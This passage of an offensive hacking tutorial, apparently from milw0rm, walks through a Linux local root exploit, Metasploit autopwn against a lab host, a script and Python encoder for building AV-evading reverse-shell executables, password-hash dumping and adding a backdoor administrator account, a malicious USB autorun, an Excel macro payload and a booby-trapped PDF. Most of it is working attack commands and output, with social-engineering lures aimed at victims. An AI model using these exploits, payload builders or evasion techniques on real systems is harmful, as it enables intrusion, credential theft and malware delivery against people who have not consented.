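# A missing component counts as 0, so 2.6.24 == 2.6.24.0.
vercmp() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, x, "."); nb = split(b, y, ".")
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            xi = (i <= na) ? x[i] + 0 : 0
            yi = (i <= nb) ? y[i] + 0 : 0
            if (xi < yi) { print "-1"; exit }
            if (xi > yi) { print "1"; exit }
        }
        print "0"
    }'
}

# kernel_in_range <uname -r string> <low> <high>: succeeds when low <= kernel <= high.
kernel_in_range() {
    k=$(kernel_numeric "$1")
    [ "$(vercmp "$k" "$2")" -ge 0 ] && [ "$(vercmp "$k" "$3")" -le 0 ]
}

# On the target itself: check_running_kernel 2.6.17 2.6.24 && echo "candidate"
check_running_kernel() {
    kernel_in_range "$(uname -r)" "$1" "$2"
}
```

A match only says the exploit is worth trying; distribution kernels are often backported fixes with an unchanged version string, so the range test is a filter, not a guarantee.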

user1@linuxserver:~$ wget http://milw0rm.com/exploits/5092
--17:17:21-- http://milw0rm.com/exploits/5092
=> `5092'
Resolving milw0rm.com... 76.74.9.18
Connecting to milw0rm.com|76.74.9.18|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

[ <=> ] 7,197 11.58K/s

17:17:23 (11.58 KB/s) - `5092' saved [7197]

user1@linuxserver:~$ gcc -o 5092 5092.c
5092.c:289:28: warning: no newline at end of file
user1@linuxserver:~$ ./5092
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e79000 .. 0xb7eab000
[+] root
root@linuxserver:~# id
uid=0(root) gid=0(root) groups=1001(root)

Finally, we are root on the target server. We can do whatever we want. XD


#####################################
[0x03] - Metasploit Ninja-Autopwned
#####################################

Metasploit is a tool for exploiting system vulnerabilities, but the penetration tester needs to find those vulnerabilities first;
this is a drawback of Metasploit. However, the latest version of Metasploit adds a feature called "Autopwn" which automatically
exploits the vulnerabilities reported by nmap or Nessus.
Note: the same autopwn feature can be pointed at a whole network scanned with nmap to automate exploitation across every host found.

+++++++++++++++++++++++++++++++++++++
[0x03a] - Nmap+Metasploit Autopwned
+++++++++++++++++++++++++++++++++++++

[Nmap Result]-----------------------------------------------------------------------------------

bt ~ # nmap -sS 192.168.80.129 -oX nmap.xml

Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 12:04 GMT
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.54 seconds

[End Result]------------------------------------------------------------------------------------

Now we have nmap.xml to import into the Metasploit framework...

[Import Nmap result to Metasploit]--------------------------------------------------------------

bt framework3 # msfconsole
_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|


=[ msf v3.3-dev
+ -- --=[ 288 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 56 aux

msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf > db_create /tmp/test.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /tmp/test.db
msf > db_import_nmap_xml /root/nmap.xml
msf > db_hosts
[*] Time: Fri Jul 03 14:01:56 +0000 2009 Host: 192.168.80.129 Status: alive OS:
msf > db_autopwn -p -e
[*] (3/116): Launching exploit/unix/webapp/tikiwiki_jhot_exec against 192.168.80.129:80...
[*] (8/116): Launching exploit/unix/webapp/awstats_configdir_exec against 192.168.80.129:80...
[*] (9/116): Launching exploit/windows/http/bea_weblogic_transfer_encoding against 192.168.80.129:80...

[*] Started bind handler
[*] Started bind handler
[*] (12/116): Launching exploit/unix/webapp/awstats_migrate_exec against 192.168.80.129:80...
[*] (13/116): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129:135...
[*] Started bind handler
[*] Started bind handler
[*] Job limit reached, waiting on modules to finish...
[*] The server returned: 404 Object Not Found
[*] This server may not be vulnerable
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.80.129[135] ...
[*] The server returned: 404 Object Not Found
[*] This server may not be vulnerable
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.80.129[135] ...
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Command shell session 1 opened (192.168.80.131:52929 -> 192.168.80.129:10529)
.......
.......
sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.80.131:52929 -> 192.168.80.129:10529
2 Command shell 192.168.80.131:50775 -> 192.168.80.129:17887
3 Command shell 192.168.80.131:40985 -> 192.168.80.129:37295
4 Command shell 192.168.80.131:51652 -> 192.168.80.129:37095
5 Command shell 192.168.80.131:38373 -> 192.168.80.129:17130
6 Command shell 192.168.80.131:56722 -> 192.168.80.129:20693

msf >sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.80.129
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.80.2

C:\WINNT\system32>

[End Result]------------------------------------------------------------------------------------


+++++++++++++++++++++++++++++++++++++++
[0x03b] - Nessus+Metasploit Autopwned
+++++++++++++++++++++++++++++++++++++++

First, you must scan with Nessus for vulnerability assessment and export the results as a *.nbe file, then import it into the Metasploit framework for autopwn:

[Import Nessus(nbe) result to Metasploit]-------------------------------------------------------

bt framework3 # msfconsole

# # ###### ##### ## #### ##### # #### # #####
## ## # # # # # # # # # # # #
# ## # ##### # # # #### # # # # # # #
# # # # ###### # ##### # # # # #
# # # # # # # # # # # # # #
# # ###### # # # #### # ###### #### # #


=[ msf v3.3-dev
+ -- --=[ 288 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 56 aux

msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf > db_create /tmp/ness.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /tmp/ness.db
msf > db_import_nessus_nbe /root/demo.nbe
msf > db_hosts
[*] Time: Fri Jul 03 14:43:58 +0000 2009 Host: 192.168.80.129 Status: alive OS:
msf > db_autopwn -x -t
[*] Analysis completed in 4.28915095329285 seconds (17 vulns / 1145 refs)
[*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.80.129:445...
[*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129:135...
[*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.80.129:445...
[*] Matched exploit/windows/mssql/ms02_039_slammer against 192.168.80.129:1434...
[*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.80.129:445...
[*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.80.129:445...
msf > db_autopwn -x -e
[*] (2/6): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129:135...
[*] (3/6): Launching exploit/windows/smb/ms06_040_netapi against 192.168.80.129:445...

[*] Started bind handler
[*] (4/6): Launching exploit/windows/mssql/ms02_039_slammer against 192.168.80.129:1434...
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.80.129[135] ...
[*] (5/6): Launching exploit/windows/smb/ms05_039_pnp against 192.168.80.129:445...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.80.129[135] ...
[*] Started bind handler
[*] (6/6): Launching exploit/windows/smb/ms04_011_lsass against 192.168.80.129:445...
[*] Sending UDP packet with return address 0x42b48774
[*] Execute 'net start sqlserveragent' once access is obtained
[*] Started bind handler
[*] Connecting to the SMB service...
[*] Sending exploit ...
msf >
[*] Detected a Windows 2000 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.80.129[\BROWSER] ...
[*] Started bind handler
[*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.80.129[\browser] ...
[*] The DCERPC service did not reply to our request
[*] Command shell session 1 opened (192.168.80.131:41655 -> 192.168.80.129:39354)
[*] Command shell session 2 opened (192.168.80.131:57118 -> 192.168.80.129:7605)
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.80.129[\lsarpc]...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.80.129[\BROWSER] ...
[*] Building the stub data...
[*] Bound to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.80.129[\browser] ...
[*] Calling the vulnerable function...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.80.129[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.0
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 3 opened (192.168.80.131:50407 -> 192.168.80.129:15299)
[*] Command shell session 4 opened (192.168.80.131:32768 -> 192.168.80.129:30092)
[*] The DCERPC service did not reply to our request
[*] Command shell session 5 opened (192.168.80.131:39556 -> 192.168.80.129:17330)
sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.80.131:41655 -> 192.168.80.129:39354
2 Command shell 192.168.80.131:57118 -> 192.168.80.129:7605
3 Command shell 192.168.80.131:50407 -> 192.168.80.129:15299
4 Command shell 192.168.80.131:32768 -> 192.168.80.129:30092
5 Command shell 192.168.80.131:39556 -> 192.168.80.129:17330

msf > sessions -i 3
[*] Starting interaction with 3...

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.80.129
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.80.2

C:\WINNT\system32>

[End Result]------------------------------------------------------------------------------------


#############################################
[0x04] - Client-Side Attack with Metasploit
#############################################


++++++++++++++++++++++++++++++++++++++++
[0x04a] - Metasploit Payload Generator
++++++++++++++++++++++++++++++++++++++++

Metasploit Payload Generator is a tool that makes it easy to create a malicious executable.
It does not exploit anything by itself: you use it to build a payload, save it as an .exe file,
and then you have to lure the victim into running that file on his or her machine.

It can also encode the payload to get past most AV and IDS/IPS (13 encoding choices). Keep in mind
that encoding only changes the bytes of the raw shellcode, so it defeats signature matching on the
shellcode itself; the decoder stub and the behaviour of the payload once it runs are still visible.
The generator ships with "Fast-Track". If you don't have Fast-Track, the Metasploit framework plus
the script below do the same job ;)

[metascript]------------------------------------------------------------------------------------

#!/bin/bash
# MetaCompiler: build an encoded reverse-connect payload with msfpayload/msfencode,
# then start a multi/handler listener for it. Paths are BackTrack's framework3 tree.
MSF=/pentest/exploits/framework3

echo "###########################################"
echo "#### 0-Days Exploits with MetaCompiler ####"
echo "###########################################"
echo ""
echo -n "Enter your Listener IP Address: "
read ip
echo -n "Enter your Listener Port: "
read port
echo ""
echo "-= MetaCompiler Payloads =-"
echo ""
echo "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
echo "+ Meterpreter Reverse Connectback - windows/meterpreter/reverse_tcp +"
echo "+ VNC Inject Reverse Connectback - windows/vncinject/reverse_tcp +"
echo "+ Generic Reverse Shell - generic/shell_reverse_tcp +"
echo "+ Linux X86 Reverse Shell - linux/x86/shell_reverse_tcp +"
echo "+ Mac OSX (PowerPC) Reverse Shell - osx/ppc/shell/reverse_tcp +"
echo "+ Windows Reverse Shell - windows/shell/reverse_tcp +"
echo "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
echo ""
echo -n "Enter your payload (e.g. windows/meterpreter/reverse_tcp): "
read payload
echo -n "Enter your Output file name (xpl.exe): "
read file
echo ""
echo "-= Processing =-"
# R = raw shellcode on stdout; msfencode wraps it in a Windows PE (-t exe; use -t elf for
# the Linux payload). -b '' declares no bad characters, so the default encoder
# (shikata_ga_nai on x86) is applied without restrictions.
"$MSF/msfpayload" "$payload" LHOST="$ip" LPORT="$port" R | "$MSF/msfencode" -b '' -t exe -o "$file"
echo "Enjoy 0-Days Exploit with $file ;)"
echo ""
echo ""
echo "-= Now Waiting for Reverse Connection from Victim =-"
# The handler must be started with the same payload, LHOST and LPORT the executable was built with.
"$MSF/msfcli" multi/handler PAYLOAD="$payload" LHOST="$ip" LPORT="$port" DisableCourtesyShell=True E

[End script]------------------------------------------------------------------------------------
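To see what the encoding step and msfencode's -b (bad characters) option actually do, here is an added example (not code from this paper or from Metasploit): a simplified XOR encoder with additive feedback in the spirit of shikata_ga_nai, its matching decoder, and a key search that keeps the encoded bytes free of characters the target cannot accept. The sample payload is the classic 23-byte Linux x86 execve("/bin//sh") shellcode, embedded as a constructed byte string; the bad-character set and the byte-wise feedback rule are assumptions of the example. A real encoder must also emit an x86 decoder stub that itself avoids the bad characters, which this one does not.

```python
"""Simplified polymorphic XOR encoder (added example, not Metasploit code).

Each payload byte is XORed with a running 8-bit key; after every byte the
key is advanced by adding the *plaintext* byte (additive feedback), the
same idea shikata_ga_nai applies to dwords. Two consequences:
  * the same payload encodes to different bytes for every initial key, so
    a signature written against the raw shellcode no longer matches;
  * a key can be chosen so that the encoded bytes avoid characters the
    target cannot accept (what msfencode's -b option lists), e.g. NUL for
    strcpy-style bugs.
A real encoder must also prepend a machine-code decoder stub that itself
avoids the bad characters; that part is out of scope here.
"""
from typing import Optional, Tuple

# Constructed sample: classic 23-byte Linux x86 execve("/bin//sh") shellcode.
SAMPLE_SHELLCODE = bytes.fromhex(
    "31c0" "50" "682f2f7368" "682f62696e" "89e3" "50" "53" "89e1" "b00b" "cd80"
)

# Assumed bad characters: NUL, LF, CR (typical for string-handling bugs).
BAD_CHARS = b"\x00\x0a\x0d"


def encode(payload: bytes, key: int) -> bytes:
    """XOR-encode payload with a key that is advanced by each plaintext byte."""
    out = bytearray()
    k = key & 0xFF
    for b in payload:
        out.append(b ^ k)
        k = (k + b) & 0xFF          # feedback: next key depends on plaintext
    return bytes(out)


def decode(encoded: bytes, key: int) -> bytes:
    """Inverse of encode(); this is what a decoder stub does at run time."""
    out = bytearray()
    k = key & 0xFF
    for c in encoded:
        b = c ^ k
        out.append(b)
        k = (k + b) & 0xFF          # same feedback, now from the recovered byte
    return bytes(out)


def contains_bad_chars(data: bytes, bad: bytes) -> bool:
    """True if any byte of data is in the bad-character set."""
    return any(c in bad for c in data)


def find_key(payload: bytes, bad: bytes, start: int = 1) -> Optional[int]:
    """First 8-bit key whose encoding of payload is free of bad characters."""
    for key in range(start, 256):
        if not contains_bad_chars(encode(payload, key), bad):
            return key
    return None


def encode_avoiding(payload: bytes, bad: bytes) -> Tuple[int, bytes]:
    """Encode payload so that no bad character appears in the output."""
    key = find_key(payload, bad)
    if key is None:
        raise ValueError("no single-byte key avoids the bad characters; use another encoder")
    return key, encode(payload, key)


if __name__ == "__main__":
    key, enc = encode_avoiding(SAMPLE_SHELLCODE, BAD_CHARS)
    print(f"key={key:#04x} encoded={enc.hex()}")
    print("round trip ok:", decode(enc, key) == SAMPLE_SHELLCODE)
    print("key 2 gives different bytes:", encode(SAMPLE_SHELLCODE, 2) != enc)
```

Run it as-is to see the encoded bytes change with the key while the decoder always recovers the original shellcode; swap in your own payload and bad-character list to see when no single-byte key works, which is the situation in which a real encoder falls back to a different scheme.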


Next, an example using "Fast-Track".


[Metasploit Gen]--------------------------------------------------------------------------------

bt fast-track # ./fast-track.py -i

***********************************************
******* Performing dependency checks... *******
***********************************************

*** FreeTDS and PYMMSQL are installed. (Check) ***
*** PExpect is installed. (Check) ***
*** ClientForm is installed. (Check) ***
*** Psyco is installed. (Check) ***
*** Beautiful Soup is installed. (Check) ***
*** PyMills is installed. (Check) ***

Also ensure ProFTP, WinEXE, and SQLite3 is installed from
the Updates/Installation menu.

Your system has all requirements needed to run Fast-Track!

Fast-Track Main Menu:

Fast-Track - Where it's OK to finish in under 3 minutes...
Version: v4.0
Written by: David Kennedy (ReL1K)
http://www.securestate.com
http://www.thepentest.com

1. Fast-Track Updates
2. External Hacking
3. Internal Hacking
4. Exploits
5. SQLPwnage
6. Payload Generator
7. Tutorials
8. Changelog
9. Credits
10. About
11. Exit

Enter the number: 6
Configuration file not detected, running default path.
Recommend running setup.py install to configure Fast-Track.

#####################################
### ###
### Metasploit Payload Generator ###
### ###
### Written by: Dave Kennedy ###
### aka ReL1K ###
### ###
#####################################
#####################################


The Metasploit Payload Generator is a simple tool to
make it extremely easy to generate a payload and listener
on the Metasploit framework. This does not actually
exploit any systems, it will generate a metasploit payload
for you and save it to an executable. You then need to
someone get it on the remote server by yourself and get it
to execute correctly.

This will also encode your payload to get past most AV and
IDS/IPS.


What payload do you want to generate:

Name: Description:

1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell Execute payload and create an accepting port on remote system.
5. Windows Reflective Reverse VNC Spawn a VNC server on victim and send back to attacker.
6. Windows Reflective Reverse Meterpreter Spawn a Meterpreter shell on victim through Reflective to attacker.

Enter choice (example 1-6): 2

Below is a list of encodings to try and bypass AV.

Select one of the below, Avoid_UTF8_tolower usually gets past them.

1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
13. alpha2
14. No Encoding

Enter your choice : 2

Enter IP Address of the listener/attacker (reverse) or host/victim (bind shell): 192.168.80.131
Enter the port of the Listener: 5555

Do you want to create an EXE or Shellcode

1. Executable
2. Shellcode

Enter your choice: 1
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 278
Options: LHOST=192.168.80.131,LPORT=5555,ENCODING=shikata_ga_nai


A payload has been created in this directory and is named 'payload.exe'. Enjoy!


Do you want to start a listener to receive the payload yes or no: yes

Launching Listener...
***********************************************************************************************

Launching MSFCLI on 'exploit/multi/handler' with PAYLOAD='windows/meterpreter/reverse_tcp'
Listening on IP: 192.168.80.131 on Local Port: 5555 Using encoding: ENCODING=shikata_ga_nai

***********************************************************************************************
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.80.131:5555 -> 192.168.80.1:13948)

meterpreter > getuid
Server username: LENOVO-X200\prathan
meterpreter > use priv
Loading extension priv...success.
meterpreter > hashdump
Administrator:500:F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B
Guest:501:A0E150C75A17008EAAD3B435B51404EE:823893ADFAD2CDA6E1A414F3EBDF58F7
prathan:1003:879980DE48006E7EAAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67
TsInternetUser:1002:52FE1A30EB33BA7BE3BB722E78963414:3A07E408DB9CB2331C9C527B0F4A8C52
meterpreter > execute -H -i -f cmd.exe
Process 692 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\prathan\Desktop>hostname
LENOVO-X200

C:\Documents and Settings\prathan\Desktop>net user cwh 1234 /add
net user cwh 1234 /add
The command completed successfully.

C:\Documents and Settings\prathan\Desktop>net localgroup administrators cwh /add
net localgroup administrators cwh /add
The command completed successfully.

C:\Documents and Settings\prathan\Desktop>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator cwh Guest
prathan TsInternetUser
The command completed with one or more errors.

[End Result]------------------------------------------------------------------------------------

As shown above, we can attack a victim through social engineering if they execute "payload.exe". What happens if we use Autorun.inf to make the drive execute our file for them?

[USB Pwnage]------------------------------------------------------------------------------------

+autorun.inf
[autorun]
action=Open Files On Folder
icon=icons\drive.ico
shellexecute=nircmd.exe execmd CALL batexe\progstart.bat

+icons
+nircmd.exe

+batexe
-progstart.bat
@echo off
nircmd.exe execmd CALL batexe\moddump.bat
nircmd.exe execmd CALL batexe\modsmax.bat

-moddump.bat
@echo off
nircmd.exe execmd .\batexe\payload.exe

-modsmax.bat
@echo off
start ..
nircmd.exe win max ititle "Remo"

[End File]-------------------------------------------------------------------------------------

If someone opens the USB drive with Autorun enabled, or double-clicks the drive in My Computer, their system is compromised !! Note that this relies on AutoRun being enabled for removable drives; later Windows updates turned it off by default, so the trick only works on systems that have not been patched.


++++++++++++++++++++++++++++++++++
[0x04b] - MS-Office Macro Ownage
++++++++++++++++++++++++++++++++++

MS Word, Excel, PowerPoint, etc. can carry VBA macros inside their files, and Metasploit can generate a VBA module (msfpayload's V output) that contains a malicious payload !!
In this example, we show the steps for exploiting a victim through MS Excel. The victim machine will start a reverse VNC connection to our machine after
the victim opens the Excel file and allows the macro to run.

[Msf script]------------------------------------------------------------------------------------

bt framework3 # ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.80.131 V > /tmp/script.bas
bt framework3 # ./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.80.131 DisableCourtesyShell=True E
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2658 bytes)
[*] Sleeping before handling stage...

[End Result]------------------------------------------------------------------------------------


Now we have "script.bas". Open MS Excel -> Tools -> Macro -> Visual Basic Editor, import "script.bas" and save the Excel file.
After that, use your social-engineering skill to make them open the Excel file and click Enable Macros. We then control the target via VNC viewer with their privileges.


++++++++++++++++++++++++++++++++++
[0x04c] - AdobeReader PDF Ownage
++++++++++++++++++++++++++++++++++

Metasploit has an exploit module that generates a malicious PDF file attacking the "Adobe JBIG2Decode Memory Corruption" flaw.
The module exploits a heap-based pointer corruption in Adobe Reader 9.0.0 and earlier.
We generate the malicious PDF, send it to the victim, and social-engineer them into opening it. Game Over !!

[AdobeReader Exploit]---------------------------------------------------------------------------

bt framework3 # msfconsole


=[ msf v3.3-dev
+ -- --=[ 288 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 56 aux

msf > use windows/fileformat/adobe_jbig2decode
msf exploit(adobe_jbig2decode) > set TARGET 0
TARGET => 0
msf exploit(adobe_jbig2decode) > set FILENAME malfile.pdf
FILENAME => malfile.pdf
msf exploit(adobe_jbig2decode) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_jbig2decode) > set LHOST 192.168.80.131
LHOST => 192.168.80.131
msf exploit(adobe_jbig2decode) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Creating 'malfile.pdf' file...
[*] Generated output file /pentest/exploits/framework3/data/exploits/malfile.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_jbig2decode) > exit
bt framework3 # ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.80.131 E
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.80.131:4444 -> 192.168.80.132:1041)

meterpreter > getuid
Server username: WINXP\victim
meterpreter > execute -H -i -f cmd.exe
Process 692 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\victim\Desktop> Ownage Again !!!

[End Result]------------------------------------------------------------------------------------

Other techniques such as "DNS spoofing + IE7" are great for mass exploitation; you can see a video at http://www.milw0rm.com/video/watch.php?id=96
It uses Ettercap for DNS spoofing and Metasploit to handle the reverse shells from the "IE7 MS09-002 Memory Corruption Vulnerability". Every machine on the same network
that resolves the spoofed name is driven to the attacker's machine and ... Game Over !!


####################
[0x06] - Greetz To
####################

Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com

----------------------------------------------------
This paper is written for educational purposes only. The authors are not responsible for any damage
resulting from misuse of this paper. If you want to use this knowledge on other people's systems,
you must obtain consent from the system owner first.
----------------------------------------------------



Source: milw0rm